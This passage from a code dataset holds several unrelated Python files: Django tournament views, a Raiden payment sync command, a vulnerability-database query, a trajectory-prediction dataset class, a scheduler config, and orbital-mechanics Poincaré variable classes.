match.team1.name\n res['name_2'] = match.team2.name\n res['score_1'] = match.team_1_hit\n res['score_2'] = match.team_2_hit\n return JsonResponse(res)\n\n\nclass GetMatchListView(View):\n\n def get(self, request):\n round_pk = request.GET.get('pk')\n round_entry = Round.objects.get(pk=round_pk)\n res = {}\n for i in round_entry.match_set.all():\n res[i.pk] = i.show_score()\n return JsonResponse(res)\n\n\nclass SetMatchScore(View):\n\n def post(self, request):\n match_pk = request.POST.get('pk')\n score_1 = request.POST.get('score_1')\n score_2 = request.POST.get('score_2')\n match = Match.objects.get(pk=match_pk)\n match.set_result(score_1, score_2)\n res = {}\n res['pk'] = match_pk\n res['score'] = '%s : %s' % (score_1, score_2)\n return JsonResponse(res)\n\n\nclass TournamentTable(ListView):\n\n model = Match\n tempalte_name = 'tourn_table'\n\n\ndef generate_player_pair(query):\n random_index = int(len(query)/5)\n res = []\n first_index = 0\n last_index = random_index\n one_more = True\n middle_index = len(query)/2\n while one_more:\n first_query = list(query[first_index:last_index])\n last_query = list(query.reverse()[first_index:last_index])\n for i in range(len(first_query)):\n first_choice = random.choice(first_query)\n first_query.remove(first_choice)\n second_choice = random.choice(last_query)\n last_query.remove(second_choice)\n res.append((first_choice, second_choice))\n if last_index == middle_index:\n one_more = False\n if last_index + random_index <= middle_index:\n first_index += random_index\n last_index += random_index\n else:\n new_random_index = middle_index - last_index\n first_index += random_index\n last_index += new_random_index\n return res\n\n\ndef generate_matches_pairs(query):\n res = []\n query = list(query)\n for i in query:\n for j in query[query.index(i)+1:]:\n res.append((i, j))\n return res\n\n\ndef generate_play_off_pairs(query):\n res = []\n query = list(query)\n for i in range(0, len(query), 2):\n res.append((query[i], 
query[i+1]))\n return res\n","sub_path":"apps/tournament/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344318266","text":"import time\n\ndef update_index(index_filename, left, right):\n '''Append a record to the index.'''\n\n # Read existing data.\n with open(index_filename, 'r') as raw:\n reader = csv.reader(raw)\n records = []\n for r in reader:\n records.append(r)\n \n # Create new record.\n timestamp = time.strftime('%Y-%m-%d')\n data_filename = left + '-' + right + '.csv'\n new_record = (timestamp, left, right, data_filename)\n \n # Save.\n records.append(new_record)\n with open(index_filename, 'w') as raw:\n writer = csv.writer(raw)\n writer.writerows(records)\n","sub_path":"src/syndicate/make_index.py","file_name":"make_index.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"411625083","text":"import logging\nimport time\n\nfrom django.core.management.base import BaseCommand\nfrom web3 import Web3\n\nfrom hub20.apps.blockchain.client import get_web3\nfrom hub20.apps.ethereum_money.client import get_token_information\nfrom hub20.apps.ethereum_money.models import EthereumToken\nfrom hub20.apps.raiden import models\nfrom hub20.apps.raiden.client import RaidenClient, RaidenConnectionError\nfrom hub20.apps.raiden.contracts import get_token_network_registry_contract\n\nlogger = logging.getLogger(__name__)\n\n\ndef sync_token_networks(client: RaidenClient, w3: Web3):\n logger.info(\"Updating Token Networks\")\n known_tokens = client.raiden.token_networks.values_list(\"token__address\", flat=True)\n\n chain_id = int(w3.net.version)\n\n for token_address in client.get_token_addresses():\n if token_address in known_tokens:\n continue\n\n logger.info(f\"Getting information about token on {token_address}\")\n token_data = 
get_token_information(w3=w3, address=token_address)\n token = EthereumToken.make(address=token_address, chain_id=chain_id, **token_data)\n token_network_registry_contract = get_token_network_registry_contract(w3)\n token_network = models.TokenNetwork.make(token, token_network_registry_contract)\n client.raiden.token_networks.add(token_network)\n\n\ndef sync_channels(client: RaidenClient):\n logger.info(\"Updating Channels\")\n for channel_data in client.get_channels():\n channel = models.Channel.make(client.raiden, **channel_data)\n logger.info(f\"{channel} information synced\")\n\n\ndef sync_payments(client: RaidenClient):\n for channel in client.raiden.channels.all():\n logger.info(f\"Getting new payments from {channel}\")\n for payment_data in client.get_new_payments(channel):\n models.Payment.make(channel, **payment_data)\n\n\nclass Command(BaseCommand):\n help = \"Connects to Raiden via REST API to collect information about new transfers\"\n\n def handle(self, *args, **options):\n w3 = get_web3()\n\n while True:\n for raiden in models.Raiden.objects.all():\n client = RaidenClient(raiden)\n try:\n sync_token_networks(client, w3)\n sync_channels(client)\n sync_payments(client)\n except RaidenConnectionError as exc:\n logger.warn(str(exc))\n time.sleep(5)\n except Exception as exc:\n logger.exception(exc)\n time.sleep(3)\n","sub_path":"hub20/apps/raiden/management/commands/sync_raiden.py","file_name":"sync_raiden.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635954754","text":"from lib.database import get_postgres_connection\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nimport datetime\npostgres = get_postgres_connection()\nPOSTGRES_HOST = postgres.host\nPOSTGRES_PORT = postgres.port\nPOSTGRES_USER = postgres.user\nPOSTGRES_PWD = postgres.password\nPOSTGRES_DB = postgres.db\nBase = 
automap_base()\n# Create engine, session\nengine = create_engine(\n \"postgresql+psycopg2://\"\n + POSTGRES_USER\n + \":\"\n + POSTGRES_PWD\n + \"@\"\n + POSTGRES_HOST\n + \":\"\n + POSTGRES_PORT\n + \"/\"\n + POSTGRES_DB,\n client_encoding=\"utf-8\",\n)\nsession = Session(engine)\n# Reflect the tables\nBase.prepare(engine, reflect=True)\n# Mapped classes are now created with names by default\n# matching that of the table name.\nScantistLibraryVersion = Base.classes.scantist_library_version\nScantistLibrary = Base.classes.scantist_library\nScantistLibraryVersionIssue = Base.classes.scantist_libraryversionissue\nScantistSecurityIssue = Base.classes.scantist_securityissue\n\n\ndef get_updated_vul_info(timestamp=datetime.datetime(2017, 7, 25), lib_only=False):\n \"\"\"\n start from issues from a timestamp which is stored last time we did this update,\n get all related versions and their libname, vendor, version number\n \"\"\"\n updated_vul_ver_info = (\n session.query(\n ScantistLibrary.name,\n ScantistLibrary.vendor,\n ScantistLibraryVersion.version_number,\n ScantistSecurityIssue.public_id,\n ScantistLibraryVersionIssue.is_valid,\n )\n .filter(\n ScantistLibraryVersionIssue.processed_time > timestamp,\n ScantistLibrary.platform == 'Go',\n )\n .join(\n ScantistLibraryVersion,\n ScantistLibrary.id == ScantistLibraryVersion.library_id,\n )\n .join(\n ScantistLibraryVersionIssue,\n ScantistLibraryVersion.id\n == ScantistLibraryVersionIssue.library_version_id,\n )\n .join(\n ScantistSecurityIssue,\n ScantistLibraryVersionIssue.security_issue_id\n == ScantistSecurityIssue.id,\n )\n .order_by(ScantistLibraryVersionIssue.processed_time.asc())\n )\n unique_vul_node = {}\n for update in updated_vul_ver_info:\n if (\n not f\"{update[1]}-{update[0]}-{update[2]}-{update[3]}\"\n in unique_vul_node\n ):\n unique_vul_node[\n f\"{update[1]}-{update[0]}-{update[2]}-{update[3]}\"\n ] = update\n\n add_vul_rel = filter(lambda x: x[4] == True, list(unique_vul_node.values()))\n 
del_vul_rel = filter(lambda x: x[4] == False, list(unique_vul_node.values()))\n\n add_node = []\n del_node = {}\n\n for update in add_vul_rel:\n node = next((x for x in add_node if x[\"public_id\"] == update[3]), None)\n if node:\n if update[1] + \":\" + update[0] in node[\"affects\"]:\n node[\"affects\"][update[1] + \":\" + update[0]].append(update[2])\n else:\n node[\"affects\"][update[1] + \":\" + update[0]] = [update[2]]\n else:\n add_node.append(\n {\n \"public_id\": update[3],\n \"vulnerabilityId\": update[3],\n \"affects\": {update[1] + \":\" + update[0]: [update[2]]},\n }\n )\n libaffects_list = []\n affect_list = []\n vulnerable_lib = []\n vul_node = add_node\n vul_node_list = []\n for vul in vul_node:\n for libvendor, vers in vul[\"affects\"].items():\n for ver in vers:\n affect_list.append((vul['public_id'], libvendor.lstrip(':')+':'+ver))\n libaffects_list.append((vul['public_id'], libvendor.lstrip(':')))\n vulnerable_lib.append(libvendor.lstrip(':'))\n vul_node_list.append(vul['public_id'])\n vulnerable_lib = list(set(vulnerable_lib))\n libaffects_list = list(set(libaffects_list))\n affect_list = list(set(affect_list))\n vul_node_list =list(set(vul_node_list))\n if lib_only:\n return vulnerable_lib\n else:\n return libaffects_list, affect_list, vul_node_list\n\n","sub_path":"calculating_affected_libs/get_libaffect.py","file_name":"get_libaffect.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344650468","text":"\"\"\"lstm_utils.py contains utility functions for running LSTM Baselines.\"\"\"\n\nimport os\nfrom typing import Any, Dict, List, Tuple\nimport torch\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset\nfrom .map_features_utils import MapFeaturesUtils\n\nfrom .baseline_config import *\n\nuse_cuda = torch.cuda.is_available()\nif use_cuda:\n device = torch.device(\"cuda\")\nelse:\n device = 
torch.device(\"cpu\")\n\n\n\ncmd_codes = dict(m=0, l=1, c=2, a=3, EOS=4, SOS=5, z=6)\nCOLOR_IDXS = slice(1,6)\n\n\ndef linear_cmd_to_tensor(cmd_index, end_position: tuple, start_position: tuple = None, pad=-1):\n start_pos = start_position if start_position is not None else (0, 0)\n return torch.tensor(\n [cmd_index, *([pad] * 5), start_pos[0], start_pos[1], *([pad] * 4), end_position[0], end_position[1]])\n\n\ndef linear_path_to_tensor(path, pad=-1):\n return torch.stack([linear_cmd_to_tensor(cmd_codes['m'], path[0], pad=pad)] + [\n linear_cmd_to_tensor(cmd_codes['l'], path[i], path[i - 1], pad=pad) for i in range(1, len(path))])\n\n\ndef apply_colors(paths, colors, idxs: slice = COLOR_IDXS):\n colors = colors if colors is not None else [-1] * len(paths)\n for i in range(len(paths)):\n paths[i][:, idxs] = colors[i]\n return paths\n\n\n\n\nclass RasterDataset(Dataset):\n \"\"\"PyTorch Dataset for LSTM Baselines.\"\"\"\n def __init__(self, data_dict: Dict[str, Any], args: Any, mode: str):\n \"\"\"Initialize the Dataset.\n\n Args:\n data_dict: Dict containing all the data\n args: Arguments passed to the baseline code\n mode: train/val/test mode\n\n \"\"\"\n self.data_dict = data_dict\n self.args = args\n self.mode = mode\n\n # Get input\n self.input_data = data_dict[\"{}_input\".format(mode)]\n if mode != \"test\":\n self.output_data = data_dict[\"{}_output\".format(mode)]\n self.data_size = self.input_data.shape[0]\n\n # Get helpers\n self.helpers = self.get_helpers()\n self.helpers = list(zip(*self.helpers))\n \n \n \n from argoverse.map_representation.map_api import ArgoverseMap\n\n self.avm = ArgoverseMap()\n self.mf=MapFeaturesUtils()\n \n\n def __len__(self):\n \"\"\"Get length of dataset.\n\n Returns:\n Length of dataset\n\n \"\"\"\n return self.data_size\n\n def __getitem__(self, idx: int\n ) -> Tuple[torch.FloatTensor, Any, Dict[str, np.ndarray]]:\n \"\"\"Get the element at the given index.\n\n Args:\n idx: Query index\n\n Returns:\n A list containing input 
Tensor, Output Tensor (Empty if test) and viz helpers. \n\n \"\"\"\n helper=self.helpers[idx]\n cnt_lines,img,cnt_lines_norm=self.mf.get_candidate_centerlines_for_trajectory(\n helper[0] if self.mode != \"test\" else helper[0][:20],\n yaw_deg=helper[5],centroid=helper[0][0],\n city_name=helper[1][0],avm=self.avm,\n viz=True,\n seq_len = 80,\n max_candidates=10,\n )\n \n \n res = torch.cat([linear_path_to_tensor(path, -1) for path in cnt_lines_norm], 0)\n\n return (\n torch.FloatTensor(self.input_data[idx]),\n torch.empty(1) if self.mode == \"test\" else torch.FloatTensor(\n self.output_data[idx]),\n img,\n cnt_lines,\n cnt_lines_norm,\n res,\n \n )\n\n def get_helpers(self) -> Tuple[Any]:\n \"\"\"Get helpers for running baselines.\n\n Returns:\n helpers: Tuple in the format specified by LSTM_HELPER_DICT_IDX\n\n Note: We need a tuple because DataLoader needs to index across all these helpers simultaneously.\n\n \"\"\"\n helper_df = self.data_dict[f\"{self.mode}_helpers\"]\n candidate_centerlines = helper_df[\"CANDIDATE_CENTERLINES\"].values\n# print(\"ss\",candidate_centerlines)\n candidate_nt_distances = helper_df[\"CANDIDATE_NT_DISTANCES\"].values\n xcoord = np.stack(helper_df[\"FEATURES\"].values\n )[:, :, FEATURE_FORMAT[\"X\"]].astype(\"float\")\n ycoord = np.stack(helper_df[\"FEATURES\"].values\n )[:, :, FEATURE_FORMAT[\"Y\"]].astype(\"float\")\n centroids = np.stack((xcoord, ycoord), axis=2)\n _DEFAULT_HELPER_VALUE = np.full((centroids.shape[0]), None)\n city_names = np.stack(helper_df[\"FEATURES\"].values\n )[:, :, FEATURE_FORMAT[\"CITY_NAME\"]]\n seq_paths = helper_df[\"SEQUENCE\"].values\n translation = (helper_df[\"TRANSLATION\"].values\n if self.args.normalize else _DEFAULT_HELPER_VALUE)\n rotation = (helper_df[\"ROTATION\"].values\n if self.args.normalize else _DEFAULT_HELPER_VALUE)\n\n use_candidates = self.args.use_map and self.mode == \"test\"\n\n candidate_delta_references = (\n helper_df[\"CANDIDATE_DELTA_REFERENCES\"].values\n if self.args.use_map 
and use_candidates else _DEFAULT_HELPER_VALUE)\n delta_reference = (helper_df[\"DELTA_REFERENCE\"].values\n if self.args.use_delta and not use_candidates else\n _DEFAULT_HELPER_VALUE)\n\n helpers = [None for i in range(len(LSTM_HELPER_DICT_IDX))]\n\n # Name of the variables should be the same as keys in LSTM_HELPER_DICT_IDX\n for k, v in LSTM_HELPER_DICT_IDX.items():\n helpers[v] = locals()[k.lower()]\n\n return tuple(helpers)\n","sub_path":"src/argoverse/utils/.ipynb_checkpoints/raster_utils-checkpoint.py","file_name":"raster_utils-checkpoint.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"455763441","text":"# -*- coding: utf-8 -*-\n# 15/6/27\n# create by: snower\n\nimport os\nfrom .utils import string_type, number_type\n\n__config = {}\n\nDEFAULT_CONFIG = {\n \"LOG_FILE\": \"/var/log/funsun.log\",\n \"LOG_LEVEL\": \"ERROR\",\n \"LOG_FORMAT\": \"\",\n\n \"BIND_ADDRESS\": \"0.0.0.0\",\n \"PORT\": 6458,\n\n \"HTTP_BIND\": \"\",\n\n \"STORE_DRIVER\": \"mem\",\n\n \"STORE_MEM_STORE_FILE\": \"/tmp/forsun.session\",\n\n \"STORE_REDIS_HOST\": \"127.0.0.1\",\n \"STORE_REDIS_PORT\": 6379,\n \"STORE_REDIS_DB\": 0,\n \"STORE_REDIS_PREFIX\": \"forsun\",\n \"STORE_REDIS_SERVER_ID\": 0,\n \"STORE_REDIS_MAX_CONNECTIONS\": 8,\n \"STORE_REDIS_CLIENT_TIMEOUT\": 7200,\n \"STORE_REDIS_BULK_SIZE\": 5,\n\n \"ACTION_SHELL_CWD\": \"/tmp\",\n \"ACTION_HTTP_MAX_CLIENTS\": 64,\n \"ACTION_HTTP_CONNECT_TIMEOUT\": 5,\n \"ACTION_HTTP_REQUEST_TIMEOUT\": 120,\n \"ACTION_REDIS_MAX_CONNECTIONS\": 8,\n \"ACTION_REDIS_CLIENT_TIMEOUT\": 7200,\n \"ACTION_REDIS_BULK_SIZE\": 5,\n \"ACTION_THRIFT_MAX_CONNECTIONS\": 64,\n \"ACTION_MYSQL_USER\": \"root\",\n \"ACTION_MYSQL_PASSWD\": \"\",\n \"ACTION_MYSQL_MAX_CONNECTIONS\": 8,\n \"ACTION_MYSQL_WAIT_CONNECTION_TIMEOUT\": 7200,\n \"ACTION_MYSQL_IDLE_SECONDS\": 120,\n\n \"EXTENSION_PATH\": \"\",\n \"EXTENSIONS\": [],\n}\n\ndef get(name, default=None):\n return 
__config.get(name, default)\n\ndef set(name, value):\n old_value = __config[name]\n __config[name] = value\n return old_value\n\ndef update(config):\n __config.update(config)\n return __config\n\nupdate(DEFAULT_CONFIG)\nfor key, value in DEFAULT_CONFIG.items():\n env_value = os.environ.get(key)\n if env_value is not None:\n try:\n if isinstance(value, number_type):\n set(key, int(env_value))\n elif isinstance(value, float):\n set(key, float(env_value))\n elif isinstance(value, string_type):\n set(key, str(env_value))\n except:pass","sub_path":"forsun/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"180362107","text":"import numpy as np\nfrom sympy import symbols, S, binomial, summation, sqrt, cos, sin, Function,atan2,expand_trig,diff,Matrix\nfrom .hamiltonian import Hamiltonian\nfrom .disturbing_function import get_fg_coeffs , laplace_b\nfrom .disturbing_function import DFCoeff_C,eval_DFCoeff_dict,get_DFCoeff_symbol\nfrom .nbody_simulation_utilities import get_canonical_heliocentric_orbits,add_canonical_heliocentric_elements_particle\nfrom itertools import combinations\nimport rebound\nimport warnings\ndef get_re_im_components(x,y,k):\n \"\"\"\n Get the real and imaginary components of\n (x + sgn(k) * i y)^|k|\n \"\"\"\n if k==0:\n return 1,0\n absk = abs(k)\n sgnk = np.sign(k)\n re,im=0,0\n for l in range(0,absk+1):\n b = binomial(absk,l)\n if l%2==0:\n re += b * (sgnk * y)**l * x**(absk-l) * (-1)**(l//2)\n else:\n im += b * (sgnk * y)**l * x**(absk-l) * (-1)**((l-1)//2)\n return re,im\n\ndef single_true(iterable): # Returns true if only one element in the iterable is set \n # make generator from iterable setting any zeros as valid entries (otherwise they evaluate to False)\n i = iter([item if item != 0 else True for item in iterable]) # make generator and set zeros to valid inputs\n return any(i) and not any(i) # any(i) True once 
first valid item found. not any(i) ensures no additional ones exist\n\nclass PoincareParticle(object):\n \"\"\"\n A class representing an individual member (star, planet, or test particle) of a planetary system.\n\n Attributes\n ----------\n m : float\n Mass of particle.\n Mstar : float\n Mass of central body.\n \"\"\"\n def __init__(self, m, Mstar, l, gamma, q, G=1., sLambda=None, sGamma=None, sQ=None, Lambda=None, Gamma=None, Q=None, a=None, e=None, inc=None):\n \"\"\"\n We store the specific Lambda = sqrt(G*M*a) and specific Gamma = sLambda*(1-sqrt(1-e**2)) to support test particles\n \"\"\"\n if not single_true([sLambda, Lambda, a]):\n raise AttributeError(\"Can only pass one of Lambda, sLambda (specific Lambda, i.e. per unit mass), or a (semimajor axis)\")\n if not single_true([sGamma, Gamma, e]):\n raise AttributeError(\"Can only pass one of Gamma, sGamma (specific Gamma, i.e. per unit mass), or e (eccentricity)\")\n if not single_true([sQ, Q, inc]):\n raise AttributeError(\"Can only pass one of Q, sQ (specific Q, i.e. 
per unit mass), or inc (inclination)\")\n \n mu = m * Mstar / (m + Mstar)\n if sLambda:\n self.sLambda = sLambda\n elif Lambda:\n try:\n self.sLambda = Lambda/mu\n except:\n raise AttributeError(\"Need to pass specific actions (sLambda, sGamma, and sQ) or a, e, and inc for test particles\")\n elif a:\n self.sLambda = np.sqrt(G*M*a)\n\n if Gamma:\n try:\n sGamma = Gamma/mu\n except:\n raise AttributeError(\"Need to pass specific actions (sLambda, sGamma, and sQ) or a, e, and inc for test particles\")\n elif e:\n sGamma = self.sLambda*(1.-np.sqrt(1.-e**2))\n\n if Q:\n try:\n sQ = Q/mu\n except:\n raise AttributeError(\"Need to pass specific actions (sLambda, sGamma, and sQ) or a, e, and inc for test particles\")\n elif inc:\n sQ = (self.sLambda - self.sGamma) * (1 - np.cos(inc))\n\n self.skappa = np.sqrt(2.*sGamma)*np.cos(gamma) # X per unit sqrt(mass)\n self.seta = np.sqrt(2.*sGamma)*np.sin(gamma)\n\n self.ssigma = np.sqrt(2.*sQ)*np.cos(q) # Xinc per unit sqrt(mass)\n self.srho = np.sqrt(2.*sQ)*np.sin(q)\n\n self.m = m \n self.Mstar = Mstar\n self.G = G\n self.l = l\n \n @property\n def mu(self):\n return self.m * self.M / (self.M + self.m)\n @property \n def M(self):\n return self.Mstar + self.m\n\n @property\n def x(self):\n return (self.kappa - 1j * self.eta) / np.sqrt(2)\n @property\n def X(self):\n return self.x * np.sqrt(2 / self.Lambda)\n @property\n def y(self):\n return (self.sigma - 1j * self.rho) / np.sqrt(2)\n @property\n def Y(self):\n return self.y * np.sqrt(0.5 / self.Lambda)\n\n @property\n def xbar(self):\n return np.conj(self.x)\n @property\n def Xbar(self):\n return np.conj(self.X)\n @property\n def ybar(self):\n return np.conj(self.y)\n @property\n def Ybar(self):\n return np.conj(self.Y)\n\n @property\n def kappa(self):\n return np.sqrt(self.mu)*self.skappa\n @kappa.setter\n def kappa(self, value):\n self.skappa = value/np.sqrt(self.mu)\n @property\n def eta(self):\n return np.sqrt(self.mu)*self.seta\n @eta.setter\n def eta(self, value):\n 
self.seta = value/np.sqrt(self.mu)\n\n @property\n def sigma(self):\n return np.sqrt(self.mu)*self.ssigma\n @sigma.setter\n def sigma(self, value):\n self.ssigma = value/np.sqrt(self.mu)\n\n @property\n def rho(self):\n return np.sqrt(self.mu)*self.srho\n @rho.setter\n def rho(self, value):\n self.srho = value/np.sqrt(self.mu)\n\n @property\n def Lambda(self):\n return self.mu*self.sLambda\n @Lambda.setter\n def Lambda(self, value):\n self.sLambda = value/self.mu\n\n @property\n def Gamma(self):\n return self.mu*(self.skappa**2+self.seta**2)/2.\n @Gamma.setter\n def Gamma(self, value):\n self.sGamma = value/self.mu\n\n @property\n def Q(self):\n return self.mu*(self.ssigma**2+self.srho**2)/2.\n @Q.setter\n def Q(self, value):\n self.sQ = value/self.mu\n\n @property\n def sGamma(self):\n return (self.skappa**2+self.seta**2)/2.\n @property\n def gamma(self):\n return np.arctan2(self.seta, self.skappa)\n\n @property\n def sQ(self):\n return (self.ssigma**2+self.srho**2)/2.\n @property\n def q(self):\n return np.arctan2(self.srho,self.ssigma)\n\n @property\n def a(self):\n return self.sLambda**2/self.G/self.M\n @property\n def e(self):\n GbyL = self.sGamma/self.sLambda\n if 1-(1.-GbyL)*(1.-GbyL) < 0:\n raise AttributeError(\"sGamma:{0}, sLambda:{1}, GbyL:{2}, val:{3}\".format(self.sGamma, self.sLambda, GbyL, 1-(1.-GbyL)*(1.-GbyL)))\n return np.sqrt(1 - (1-GbyL)*(1-GbyL))\n @property\n def inc(self):\n QbyLminusG = self.sQ / (self.sLambda - self.sGamma)\n cosi = 1 - QbyLminusG\n if np.abs(cosi) > 1:\n raise AttributeError(\"sGamma:{0}, sLambda:{1}, sQ:{2}, cosi:{3}\".format(self.sGamma, self.sLambda, self.sQ,cosi))\n return np.arccos(cosi)\n\n @property\n def pomega(self):\n return -self.gamma\n\n @property\n def Omega(self):\n return -self.q\n @property\n def n(self):\n return np.sqrt(self.G*self.M/self.a**3)\n\nclass Poincare(object):\n \"\"\"\n A class representing a collection of Poincare particles constituting a planetary system.\n \"\"\"\n def __init__(self, G, 
poincareparticles=[]):\n self.G = G\n self.t = 0\n self.particles = [PoincareParticle(m=np.nan, Mstar=np.nan, G=np.nan, l=np.nan, gamma=np.nan,q=np.nan, sLambda=np.nan, sGamma=np.nan, sQ=np.nan)] # dummy particle for primary\n try:\n for p in poincareparticles:\n self.add(m=p.m, Mstar=p.Mstar, sLambda=p.sLambda, l=p.l, sGamma=p.sGamma, gamma=p.gamma, sQ = p.sQ,q=p.q)\n except TypeError:\n raise TypeError(\"poincareparticles must be a list of PoincareParticle objects\")\n\n @classmethod\n def from_Simulation(cls, sim, average=True):\n masses = [p.m for p in sim.particles]\n Mstar = masses[0]\n pvars = Poincare(sim.G)\n ps = sim.particles\n o = get_canonical_heliocentric_orbits(sim)\n for i in range(1,sim.N-sim.N_var):\n orb = o[i-1]\n M = Mstar + masses[i]\n m = masses[i]\n if orb.a <= 0. or orb.e >= 1.:\n raise AttributeError(\"Celmech error: Poincare.from_Simulation only support elliptical orbits. Particle {0}'s (heliocentric) a={1}, e={2}\".format(i, orb.a, orb.e))\n sLambda = np.sqrt(sim.G*M*orb.a)\n sGamma = sLambda*(1.-np.sqrt(1.-orb.e**2))\n sQ = sLambda*np.sqrt(1.-orb.e**2) * (1 - np.cos(orb.inc))\n pvars.add(m=m,Mstar=Mstar, sLambda=sLambda, l=orb.l, sGamma=sGamma, sQ = sQ, gamma=-orb.pomega,q=-orb.Omega)\n if average is True:\n pvars.average_synodic_terms()\n return pvars\n\n def to_Simulation(self, masses=None, average=True):\n \"\"\" \n Convert Poincare object to a REBOUND simulation.\n\n Arguments\n --------\n masses : array-like, optional\n If masses is None, will calculate physical masses from the m and M \n parameters stored by the particles. If masses is a list, will use \n those as the physical masses. 
Default is None.\n average : boole, optional\n If True, semi-major axes of simulation planets will be computed\n by converting 'mean' elements to 'osculating' ones to 0th order\n in eccentricity.\n\n Returns\n -------\n sim : rebound.Simulation\n \"\"\" \n\n if average is True:\n self.average_synodic_terms(inverse=True)\n\n if not masses:\n p1 = self.particles[1]\n masses = [p1.Mstar] + [p.m for p in self.particles]\n\n sim = rebound.Simulation()\n sim.G = self.G\n sim.add(m=masses[0])\n ps = self.particles\n for i in range(1, self.N):\n p = ps[i]\n elements = {element:getattr(p,element) for element in ['a','e','inc','l','pomega','Omega']}\n add_canonical_heliocentric_elements_particle(masses[i],elements,sim)\n sim.move_to_com()\n return sim\n \n def add(self, **kwargs):\n self.particles.append(PoincareParticle(G=self.G, **kwargs))\n\n def copy(self):\n return Poincare(self.G, self.particles[1:self.N])\n\n def average_synodic_terms(self, inverse=False):\n \"\"\"\n Do a canonical transformation to correct the Lambdas for the fact that we have implicitly\n averaged over all the synodic terms we do not include in the Hamiltonian.\n \"\"\"\n corrpvars = self.copy() # so we use original values when planet appears in more than one pair\n pairs = combinations(range(1,self.N), 2)\n #TODO assumes particles ordered going outward so a1 < a2 always. Sort first?\n for i1, i2 in pairs:\n ps = self.particles\n m1 = ps[i1].m\n m2 = ps[i2].m\n deltalambda = ps[i1].l-ps[i2].l\n G = self.G\n\n prefac = G/ps[i2].a/(ps[i1].n-ps[i2].n) \n alpha = ps[i1].a/ps[i2].a\n summation = (1. 
+ alpha**2 - 2*alpha*np.cos(deltalambda))**(-0.5)\n s = prefac*(alpha*np.cos(deltalambda)-summation+laplace_b(0.5, 0, 0, alpha)/2.)\n if inverse is True:\n s *= -1\n corrpvars.particles[i1].sLambda += m2*s # prefac*m1*m2*s/m1 (sLambda=Lambda/m)\n corrpvars.particles[i2].sLambda -= m1*s\n \n for i, p in enumerate(self.particles):\n p.sLambda = corrpvars.particles[i].sLambda\n\n @property\n def N(self):\n return len(self.particles)\n\nclass PoincareHamiltonian(Hamiltonian):\n \"\"\"\n A class representing the Hamiltonian governing the dynamical evolution of a system of particles,\n stored as a :class:`celmech.poincare.Poincare` instance.\n\n Attributes\n ----------\n H : sympy expression\n Symbolic expression for the Hamiltonian.\n NH : sympy expression\n Symbolic expression for the Hamiltonian with \n numerical values of parameters substituted\n where applicable.\n N : int\n Number of particles\n particles : list\n List of :class:`celmech.poincare.PoincareParticle`s \n making up the system.\n state : :class:`celmech.poincare.Poincare`\n A set of Poincare variables to which \n transformations are applied.\n \"\"\"\n def __init__(self, pvars):\n Hparams = {symbols('G'):pvars.G}\n pqpairs = []\n ps = pvars.particles\n H = S(0) \n for i in range(1, pvars.N):\n pqpairs.append(symbols(\"kappa{0}, eta{0}\".format(i))) \n pqpairs.append(symbols(\"Lambda{0}, lambda{0}\".format(i))) \n pqpairs.append(symbols(\"sigma{0}, rho{0}\".format(i))) \n Hparams[symbols(\"mu{0}\".format(i))] = ps[i].mu\n Hparams[symbols(\"m{0}\".format(i))] = ps[i].m\n Hparams[symbols(\"M{0}\".format(i))] = ps[i].M\n H = self.add_Hkep_term(H, i)\n self.resonance_indices = []\n super(PoincareHamiltonian, self).__init__(H, pqpairs, Hparams, pvars) \n \n @property\n def particles(self):\n return self.state.particles\n\n @property\n def N(self):\n return len(self.particles)\n \n def state_to_list(self, state):\n ps = state.particles\n vpp = 6 # vars per particle\n y = np.zeros(vpp*(state.N-1)) # remove 
padded 0th element in ps for y\n for i in range(1, state.N):\n y[vpp*(i-1)] = ps[i].kappa\n y[vpp*(i-1)+1] = ps[i].eta\n y[vpp*(i-1)+2] = ps[i].Lambda\n y[vpp*(i-1)+3] = ps[i].l \n y[vpp*(i-1)+4] = ps[i].sigma\n y[vpp*(i-1)+5] = ps[i].rho\n return y\n def set_secular_mode(self):\n # \n state = self.state\n for i in range(1,state.N):\n Lambda0,Lambda = symbols(\"Lambda{0}0 Lambda{0}\".format(i))\n self.H = self.H.subs(Lambda,Lambda0)\n self.Hparams[Lambda0] = state.particles[i].Lambda\n self._update()\n\n def set_planar_mode(self):\n state = self.state\n ps = state.particles\n for i in xrange(1,state.N):\n rho,sigma = symbols(\"rho{0} sigma{0}\".format(i))\n self.H = self.H.subs({rho:0,sigma:0})\n ps[i].srho = 0\n ps[i].ssigma = 0\n self._update() \n\n def update_state_from_list(self, state, y):\n ps = state.particles\n vpp = 6 # vars per particle\n for i in range(1, state.N):\n ps[i].skappa = y[vpp*(i-1)]/np.sqrt(ps[i].mu)\n ps[i].seta = y[vpp*(i-1)+1]/np.sqrt(ps[i].mu)\n ps[i].sLambda = y[vpp*(i-1)+2]/ps[i].mu\n ps[i].l = y[vpp*(i-1)+3]\n ps[i].ssigma = y[vpp*(i-1)+4] / np.sqrt(ps[i].mu) \n ps[i].srho = y[vpp*(i-1)+5] / np.sqrt(ps[i].mu) \n \n \n def add_Hkep_term(self, H, index):\n \"\"\"\n Add the Keplerian component of the Hamiltonian for planet ''.\n \"\"\"\n G, M, mu, Lambda = symbols('G, M{0}, mu{0}, Lambda{0}'.format(index))\n #m, M, mu, Lambda, lam, Gamma, gamma = self._get_symbols(index)\n H += -G**2*M**2*mu**3 / (2 * Lambda**2)\n return H\n def add_monomial_term(self,kvec,zvec,indexIn=1,indexOut=2,update=True):\n \"\"\"\n Add individual monomial term to Hamiltonian. The term \n is specified by 